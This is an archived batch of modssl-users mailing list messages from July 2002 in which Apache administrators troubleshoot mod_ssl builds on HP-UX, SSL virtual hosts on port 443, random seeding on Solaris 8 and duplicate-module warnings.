Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA13768; Fri, 19 Jul 2002 00:42:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from troy.barwonwater.vic.gov.au id AAA13742; Fri, 19 Jul 2002 00:41:43 +0200 (MET DST)
Received: from barwonwater.vic.gov.au (matrix.is.barwonwater.vic.gov.au [138.19.9.83])
	by troy.barwonwater.vic.gov.au (8.9.3+Sun/8.9.3) with ESMTP id IAA00430;
	Fri, 19 Jul 2002 08:41:19 +1000 (EST)
Message-ID: <3D374410.50209@barwonwater.vic.gov.au>
Date: Fri, 19 Jul 2002 08:41:20 +1000
From: Christopher Welsh 
Organization: Barwon Water
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0rc2) Gecko/20020513 Netscape/7.0b1
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: =?ISO-8859-1?Q?Fran=E7ois_D=E9sarm=E9nien?= 
CC: modssl-users@modssl.org
Subject: Re: [HS] Re: Mod_Rewrite - errors what am I doing wrong?
References: <3D36443B.6010006@barwonwater.vic.gov.au> <20020718104554.6963da74.francois@fdesar.net>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christopher Welsh 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

François,

Forgive me for being verbose and being off topic. I have Rewrite running 
on plain old apache, thought the problems may be tied in with mod_ssl, 
perhaps placement of RewriteEngine on in the httpd.conf. As for 
LoadModule directive, If you checkout my compile options you will see I 
specified apache to include rewrite. Am I off the track here?

Thanks.

François Désarménien wrote:

>Thu, 18 Jul 2002 14:29:47 +1000
>Christopher Welsh  wrote:
>
>  
>
>>G'Day,
>>
>>Anyone help with this?
>>
>>I added rewrite stuff  to the virtual host but am getting an error below
>>    
>>
>
>This list is about mod_ssl, so your mod_rewrite problem is completly out
>of topic here. And posting tons of lines of configuration is also not a
>good idea.
>
>Just to try to help you out : did you load the module with a LoadModule
>directive in your httpd.conf ?
>
>F. 
>  
>

-- 
Christopher Welsh
Barwon Regional Water Authority,
Geelong Victoria, 3216
Voice: 03 52 262385, Mobile: 0409 562968



*********************************************************************************************


The information in this e-mail message and any files transmitted with it
are confidential
and/or privileged and are intended only for the use of the individual or
entity to whom
they are addressed.  If you received this message in error please notify us
immediately
by telephone or return e-mail and delete all copies from your computer
system, as your
retention, distribution or copying of this message and files is strictly
prohibited.

It is the recipient's responsibility to check this message and files for
viruses.

***********************************************************************************************



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 19 09:06:02 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA05809; Fri, 19 Jul 2002 09:05:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp01.iprimus.net.au id JAA05763; Fri, 19 Jul 2002 09:04:06 +0200 (MET DST)
Received: from primus.com.au ([210.50.209.190]) by smtp01.iprimus.net.au with Microsoft SMTPSVC(5.0.2195.4617);
	 Fri, 19 Jul 2002 17:04:02 +1000
Message-ID: <3D37B94F.9E354158@primus.com.au>
Date: Fri, 19 Jul 2002 17:01:35 +1000
From: Ian Macdonald 
X-Mailer: Mozilla 4.78 [en] (X11; U; Linux 2.4.7-10 i686)
X-Accept-Language: en
MIME-Version: 1.0
To: Modperl , modssl-users@modssl.org,
        users@httpd.apache.org
Subject: Compiling apache with mod_perl + mod_ssl on HP-UX 10.2; link problem
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-OriginalArrivalTime: 19 Jul 2002 07:04:02.0762 (UTC) FILETIME=[76AA22A0:01C22EF2]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ian Macdonald 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I've been running apache 1.3.26 with mod_perl 1.26 statically linked in
for a while now with no problems.

I've recently tried to add mod_ssl to the configuration and the apache
build now fails at the final link like so:
 
cc  -DHPUX10 -Aa -Ae -D_HPUX_SOURCE -DMOD_SSL=208110 -DMOD_PERL
-DUSE_PERL_SSI  -Ae -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 
-DUSE_HSREGEX -DEAPI -DNO_DL_NEEDED -Ae -D_LARGEFILE_SOURCE
-D_FILE_OFFSET_BITS=64  `./apaci` -L/usr/local/ssl/lib   \
              -o httpd buildmark.o modules.o  modules/ssl/libssl.a 
modules/perl/libperl.a  modules/standard/libstandard.a  main/libmain.a 
./os/unix/libos.a  ap/libap.a regex/libregex.a   -ldbm -lssl -lcrypto
-Wl,-E -Wl,-B,deferred  
/opt/perl5/lib/5.6.1/PA-RISC1.1/auto/DynaLoader/DynaLoader.a
-L/opt/perl5/lib/5.6.1/PA-RISC1.1/CORE -lperl -lnsl_s -ldld -lm -lc
-lndir -lcrypt -lsec  -lm
/usr/ccs/bin/ld: Unsatisfied symbols:
   __umoddi3 (code)
   __udivdi3 (code)
*** Error exit code 1

Searching on the mod_perl list archive revealed one answer which was to
use the GNU ld instead; unfortunately, this doesn't seem easy on HP-UX,
as ld is not part of the standard GNU binutils package for HP-UX and
compiling the generic binutils manually doesn't build any version of ld
as far as I could tell.

The missing symbols are present in the global symbols list produced by
"nm -g /usr/local/lib/ssl/libcrypto.a", looking like this. Moving the
"-lcrypto" token around in the link line or duplicating it in various
places doesn't have any effect.
         U __udivdi3
         U __umoddi3

The config file for apache looks like this:

CC="cc" \
CFLAGS=" -Ae -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 " \
SSL_BASE="/usr/local/ssl" \
./configure \
"--with-layout=Apache" \
"--enable-module=ssl" \
"--activate-module=src/modules/perl/libperl.a" \
"--disable-rule=EXPAT" \
"--prefix=/opt/httpd_perl" \
"$@"

If I chop out the CC & CFLAGS settings, the build uses gcc and completes
ok, but then dumps core with a stack violation as soon as a perl
document is requested. I figure it's easier letting mod_perl build with
cc the way it wants to and try and fix this link issue than address a
mysterious core dump.

I can easily build with either mod_perl or mod_ssl configured and both
versions operate correctly once built.

Answers to any of these questions would be greatly appreciated:
* Why does the apache link fail?
* How do you build GNU ld for HP-UX 10.20?
* Why does mod_perl configure the apache build to use cc rather than
gcc, and can you override this without provoking core dumps?

Other version info:
mod_ssl-2.8.10-1.3.26
openssl-0.9.6d
All software mentioned was built with default config except as mentioned
above.

Thanks,
Ian

-- 
Ian Macdonald
ickphum@primus.com.au
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 19 09:32:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA07213; Fri, 19 Jul 2002 09:31:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from serv01.aet.tu-cottbus.de id JAA07201; Fri, 19 Jul 2002 09:30:56 +0200 (MET DST)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP id 003F42D29
	for ; Fri, 19 Jul 2002 09:30:54 +0200 (METDST)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id E9B612D02; Fri, 19 Jul 2002 09:30:51 +0200 (METDST)
Date: Fri, 19 Jul 2002 09:30:51 +0200
From: Lutz Jaenicke 
To: modssl-users@modssl.org
Subject: Re: Compiling apache with mod_perl + mod_ssl on HP-UX 10.2; link problem
Message-ID: <20020719073051.GA13345@serv01.aet.tu-cottbus.de>
Mail-Followup-To: modssl-users@modssl.org
References: <3D37B94F.9E354158@primus.com.au>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3D37B94F.9E354158@primus.com.au>
User-Agent: Mutt/1.4i
Organization: BTU Cottbus, Allgemeine Elektrotechnik
X-Virus-Scanned: by AMaViS snapshot-20011031
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, Jul 19, 2002 at 05:01:35PM +1000, Ian Macdonald wrote:
> I've been running apache 1.3.26 with mod_perl 1.26 statically linked in
> for a while now with no problems.
> 
> I've recently tried to add mod_ssl to the configuration and the apache
> build now fails at the final link like so:
>  
> cc  -DHPUX10 -Aa -Ae -D_HPUX_SOURCE -DMOD_SSL=208110 -DMOD_PERL
> -DUSE_PERL_SSI  -Ae -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 
> -DUSE_HSREGEX -DEAPI -DNO_DL_NEEDED -Ae -D_LARGEFILE_SOURCE
> -D_FILE_OFFSET_BITS=64  `./apaci` -L/usr/local/ssl/lib   \
>               -o httpd buildmark.o modules.o  modules/ssl/libssl.a 
> modules/perl/libperl.a  modules/standard/libstandard.a  main/libmain.a 
> ./os/unix/libos.a  ap/libap.a regex/libregex.a   -ldbm -lssl -lcrypto
> -Wl,-E -Wl,-B,deferred  
> /opt/perl5/lib/5.6.1/PA-RISC1.1/auto/DynaLoader/DynaLoader.a
> -L/opt/perl5/lib/5.6.1/PA-RISC1.1/CORE -lperl -lnsl_s -ldld -lm -lc
> -lndir -lcrypt -lsec  -lm
> /usr/ccs/bin/ld: Unsatisfied symbols:
>    __umoddi3 (code)
>    __udivdi3 (code)
> *** Error exit code 1
> 
> Searching on the mod_perl list archive revealed one answer which was to
> use the GNU ld instead; unfortunately, this doesn't seem easy on HP-UX,
> as ld is not part of the standard GNU binutils package for HP-UX and
> compiling the generic binutils manually doesn't build any version of ld
> as far as I could tell.

This solution is only partly correct.
The real reason for your problem is that at least some of your objects
have been compiled with gcc. The missing functions are part of libgcc.a,
which is available somewhere in your gcc installation.
>From your "nm" of libcrypto.a it seems that openssl was compiled with gcc.
Thus, 2 possible solutions:
* Add -L/path/to/where/libgcc/is/ -lgcc after -lcrypto, maybe at the end of
  the list. (I think this is what GNU ld makes automatically.)
* Recompile every component using HP's compiler. That's how I do it.
  Works fine for me :-)

Best regards,
	Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
http://www.aet.TU-Cottbus.DE/personen/jaenicke/
BTU Cottbus, Allgemeine Elektrotechnik
Universitaetsplatz 3-4, D-03044 Cottbus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 19 09:42:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA07710; Fri, 19 Jul 2002 09:41:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA07650; Fri, 19 Jul 2002 09:40:34 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 696C74CE74E; Fri, 19 Jul 2002 09:40:33 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 2D0102885B; Fri, 19 Jul 2002 09:36:57 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from lust id TAA23693; Thu, 18 Jul 2002 19:59:02 +0200 (MET DST)
Received: from anners by lust with local (Exim 3.33 #1)
	id 17VFeh-0004jh-00
	for modssl-users@modssl.org; Thu, 18 Jul 2002 11:05:35 -0700
Date: Thu, 18 Jul 2002 11:05:35 -0700
From: ann wallace 
To: modssl-users@modssl.org
Subject: virtual host port 443
Message-ID: <20020718110535.A17993@lust.allevil.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: ann wallace 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

im sure this question has been asked before, but i looked around and i
cannot find anything... so here goes, 

i have one virtualhost set up to use port 443, but for some reason if you go
to any of the virtualhost set up on port 80, via https it defaults to the
one host set up on port 443.

config:

Listen 1.2.3.4:80
NameVirtualHost 1.2.3.4:80


   ServerAdmin blah@blah
   DocumentRoot /home/httpd/html
   ServerName www.blah.blah
   ErrorLog logs/blah-error_log
   TransferLog logs/blah-access_log
   
     AllowOverride AuthConfig
     Options Indexes Includes ExecCGI
     Order allow,deny
     Allow from all
   




Listen 1.2.3.4:443


  ServerAdmin webmaster@otherdomain
  DocumentRoot /www/lotherdomain
  ServerName www.otherdomain.net
  ServerAlias otherdomain.net *.otherdomain.net
  ErrorLog /var/log/httpd/secure-otherdomain-errlog
  TransferLog /var/log/httpd/secure-otherdomain-access_log
  SSLEngine on
  SSLCertificateFile    /etc/httpd/conf/ssl.crt/www.otherdomain.net.crt
  SSLCertificateKeyFile /etc/httpd/conf/ssl.key/www.otherdomain.net.key
  AddType text/html .shtml .html
  AddHandler server-parsed .shtml .html
  
    Options Indexes Includes FollowSymLinks ExecCGI
    AllowOverride AuthConfig
    Order allow,deny
    Allow from all
  


thanks ann
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 19 09:42:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA07713; Fri, 19 Jul 2002 09:41:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA07652; Fri, 19 Jul 2002 09:40:35 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 8E6A64CE764; Fri, 19 Jul 2002 09:40:33 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id A835C2882D; Fri, 19 Jul 2002 09:37:29 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from numbat.object-craft.com.au id FAA27145; Fri, 19 Jul 2002 05:15:12 +0200 (MET DST)
Received: from quokka.object-craft.com.au (quokka.object-craft.com.au [192.168.0.9])
	by numbat.object-craft.com.au (Postfix) with ESMTP id 0B62016DA4
	for ; Fri, 19 Jul 2002 13:15:11 +1000 (EST)
Date: Fri, 19 Jul 2002 13:15:10 +1000
Mime-Version: 1.0 (Apple Message framework v482)
Content-Type: multipart/alternative; boundary=Apple-Mail-1--650813553
Subject: solaris 8 random number seed
From: Greg Hamilton 
To: modssl-users@modssl.org
Message-Id: 
X-Mailer: Apple Mail (2.482)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Greg Hamilton 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


--Apple-Mail-1--650813553
Content-Type: text/plain;
	charset=US-ASCII;
	format=flowed
Content-Transfer-Encoding: 7bit

Hi,

I'm having the popular 'Solaris 8 has no /dev/random' problem.

I'm using openssl-0.9.6b and I don't have the option to upgrade nor can 
I add the Solaris patch to create /dev/random. (30 odd live servers 
which I'm not allowed to reboot or mangle if it can be avoided)

I've installed egd and pgrnd packages downloaded from sunfreeware.com.

If I use the openssl command line utility then, provided I've created a 
.rnd seed file in my home directory, I can create keys, etc. without 
seeing errors about the random number generator being un-seeded.

The same is not true for Apache with mod_ssl.

I don't know how to let mod_ssl / Apache know where the random number 
seed file is.

Any help would be greatly appreciated.

Greg Hamilton

--Apple-Mail-1--650813553
Content-Type: text/enriched;
	charset=US-ASCII
Content-Transfer-Encoding: 7bit

Hi,


I'm having the popular 'Solaris 8 has no /dev/random' problem.


I'm using Lucida Grandeopenssl-0.9.6b and I
don't have the option to upgrade nor can I add the Solaris patch to
create /dev/random. (30 odd live servers which I'm not allowed to
reboot or mangle if it can be avoided)



I've installed egd and pgrnd packages downloaded from sunfreeware.com.


If I use the openssl command line utility then, provided I've created
a .rnd seed file in my home directory, I can create keys, etc. without
seeing errors about the random number generator being un-seeded.


The same is not true for Apache with mod_ssl. 


I don't know how to let mod_ssl / Apache know where the random number
seed file is.


Any help would be greatly appreciated.


Greg Hamilton
--Apple-Mail-1--650813553--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 19 10:04:01 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA09456; Fri, 19 Jul 2002 10:03:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id KAA09406; Fri, 19 Jul 2002 10:02:07 +0200 (MET DST)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.9.3+Sun/8.9.3) with ESMTP id KAA01825
	for ; Fri, 19 Jul 2002 10:02:01 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.9.3+Sun/8.9.3) with ESMTP id KAA13712
	for ; Fri, 19 Jul 2002 10:02:01 +0200 (MEST)
X-Authentication-Warning: gate0b.unix.swx.ch: iscan owned process doing -bs
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Subject: RE: https setup on Redhat Linux 7.3 usig apache webserver
Date: Fri, 19 Jul 2002 10:02:01 +0200
Message-ID: <14D1193E30E0894D8A773957C0AEE24AAA8BE9@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: https setup on Redhat Linux 7.3 usig apache webserver
Thread-Index: AcIupEtdPRtie7BhQX+ejrzlcuN+xQAU3RWg
From: "Boyle Owen" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id KAA09453
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

As I understand, you have inherited a running system of several physical machines each running an instance of apache and with several virtual hosts but all on plain HTTP. You now want to add HTTPS to the mix...

I assume you have compiled in or loaded the mod_ssl module and that you have certificate and key (even if they are just self-signed).

To get you started, the basic idea is that an SSL site is really just a port-based virtual-host (VH), usually on port 443 (the default for SSL). So on one of your web-servers, you set up a new VH and give it a doc root:

First of all, encapsulate all you SSL directives inside an  so that they only get read if you explicitly start with SSL.


	Listen ip:443
	

		DocumentRoot /path/to/ssl/area/docroot

(where "ip" = the machine's IP address). 

NB If you are running name-based virtual-hosting on this IP address, you have to add the plain HTTP port to the NameVirtualHost directive or apache will complain, i.e.

<< NameVirtualHost ip
>> NameVirtualHost ip:80

(assuming you are running plain HTTP on port 80). Don't be tempted to use NBVHing with SSL - it doesn't work.

Now, you need all the various SSL directives... The minimum set is:

		SSLEngine on
		SSLCertificateFile /path/to/cert
		SSLCertificateFile /path/to/key
	


Now test the configuration (apachectl configtest) and restart with ssl (apachectl startssl - this issues the lower-level command "httpd -DSSL" which sets the env SSL and so reads in the stuff inside ).

Now you can surf to the site with: https://your-server/ - note carefully the use of "https" to tell your browser that this is an SSL site. 

That's the basics - check out the mod_ssl docs for more details about the directives above and about others you may need to set if the defaults are not suitable.

Rgds,

Owen Boyle



>-----Original Message-----
>From: Carl Dionne [mailto:cdionne@hawaii.edu]
>Sent: Donnerstag, 18. Juli 2002 23:42
>To: modssl-users@modssl.org
>Subject: https setup on Redhat Linux 7.3 usig apache webserver
>
>
>Hello,
>
>I am new to the mailing list.  I have several redhat 7.3 linux 
>servers that
>are running Apache 1.3 webservers.  Can anyone point me to a 
>guide to setup
>the following:
>
>1.  Running a webserver using standard http
>2.  and, setting up a sub area using a virtual host to allow 
>access only
>through https.
>
>I must be missing something.  I have verified that port 443 is 
>active and
>listening.  However I loose it when trying to get the web page 
>to work with
>SSL using https instead of http.
>
>Has anyone done this before.  I successfully got squirrelmail 
>running but we
>want to use SSL for security reasons.
>
>Mahalo
>
>Carl Dionne
>UHH Computer Science
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 19 14:55:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA29592; Fri, 19 Jul 2002 14:54:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts24-srv.bellnexxia.net id OAA29554; Fri, 19 Jul 2002 14:54:03 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.173])
          by tomts24-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20020719125406.VPDS2648.tomts24-srv.bellnexxia.net@sympatico.ca>
          for ; Fri, 19 Jul 2002 08:54:06 -0400
Message-ID: <3D380BF4.2070608@sympatico.ca>
Date: Fri, 19 Jul 2002 08:54:12 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: virtual host port 443
References: <20020718110535.A17993@lust.allevil.net>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

ann wallace wrote:
> im sure this question has been asked before, but i looked around and i
> cannot find anything... so here goes, 
> 
> i have one virtualhost set up to use port 443, but for some reason if you go
> to any of the virtualhost set up on port 80, via https it defaults to the
> one host set up on port 443.
> 
> config:
> 
> Listen 1.2.3.4:80
> NameVirtualHost 1.2.3.4:80
> 
> 
>    ServerAdmin blah@blah
>    DocumentRoot /home/httpd/html
>    ServerName www.blah.blah
>    ErrorLog logs/blah-error_log
>    TransferLog logs/blah-access_log
>    
>      AllowOverride AuthConfig
>      Options Indexes Includes ExecCGI
>      Order allow,deny
>      Allow from all
>    
> 
> 
> 
> 
> Listen 1.2.3.4:443
> 
> 
>   ServerAdmin webmaster@otherdomain
>   DocumentRoot /www/lotherdomain
>   ServerName www.otherdomain.net
>   ServerAlias otherdomain.net *.otherdomain.net
>   ErrorLog /var/log/httpd/secure-otherdomain-errlog
>   TransferLog /var/log/httpd/secure-otherdomain-access_log
>   SSLEngine on
>   SSLCertificateFile    /etc/httpd/conf/ssl.crt/www.otherdomain.net.crt
>   SSLCertificateKeyFile /etc/httpd/conf/ssl.key/www.otherdomain.net.key
>   AddType text/html .shtml .html
>   AddHandler server-parsed .shtml .html
>   
>     Options Indexes Includes FollowSymLinks ExecCGI
>     AllowOverride AuthConfig
>     Order allow,deny
>     Allow from all
>   
> 
> 
> thanks ann
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

ann,

Requesting https means 'use port 443'.

That is consistent with your results, though it may not be consistent 
with your intent.

I am sorry, but I do not have the experience to know how to achieve what 
you want, however I will give the limited insight that I have aquired...

I have been able to specify ports explicitly in the url to override the 
http or https, but when left to figure it out my servers (the browsers) 
obey the rules.

http = 80
https = 443

I have specifically set a server to listen to

http = 1046
https = 1047

But, in order to make this work as expected I need to pass the port on 
the url.  I have noticed that different browsers behave differently to 
not specifying the port.  In some cases typing the url to a server 
listening on a non-standard port will result in complete failure (by not 
providing the http part)

http://my.domain.org:1046
https://my.domain.org:1047

It may be that there is more than one derived valued from the terms, 
'http' and 'https'.

I think (but wait to be corrected) that you must maintain the separation 
of function between your secure and non-secure servers so that http and 
https behave naturally.

That is ... the server that is listening on port 80 is non-secure and 
will respond to requests from 'http' while your server listening on port 
443 will be secure and will respond to requests from 'https'.

However, I don't think this precludes your ability to specify ports and 
thus force http or https on different port values.

I do not know if this will help you and I invite someone to correct me 
for the benefit of us both.

chris


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 19 15:01:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA00226; Fri, 19 Jul 2002 15:00:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id PAA00153; Fri, 19 Jul 2002 15:00:00 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Fri, 19 Jul 2002 05:59:53 -0700
Received: from 134.32.103.235 by sea2fd.sea2.hotmail.msn.com with HTTP;
	Fri, 19 Jul 2002 12:59:53 GMT
X-Originating-IP: [134.32.103.235]
From: "paul priestman" 
To: modssl-users@modssl.org
Subject: Warning message when starting modssl
Date: Fri, 19 Jul 2002 12:59:53 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 19 Jul 2002 12:59:53.0694 (UTC) FILETIME=[2CCFCFE0:01C22F24]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "paul priestman" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello mod ssl users,

I have compiled apache 1.3.26 with modssl.  However, when i start apache it 
gives me a load of warning messages:

[Fri Jul 19 13:40:36 2002] [warn] module mod_vhost_alias.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_env.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_log_config.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_mime_magic.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_mime.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_negotiation.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_status.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_info.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_include.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_autoindex.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_dir.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_cgi.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_asis.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_imap.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_actions.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_speling.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_userdir.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_alias.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_rewrite.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_access.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_auth.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_auth_anon.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_auth_dbm.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_digest.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_proxy.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_cern_meta.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_expires.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_headers.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_usertrack.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_unique_id.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_so.c is already added, skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_setenvif.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module auth_ldap.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_ssl.c is already added, 
skipping
[Fri Jul 19 13:40:36 2002] [warn] module mod_dav.c is already added, 
skipping

but apache still starts but why is it giving me these warning messages?

thanks paul

_________________________________________________________________
Chat with friends online, try MSN Messenger: http://messenger.msn.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 19 15:27:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA01776; Fri, 19 Jul 2002 15:26:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
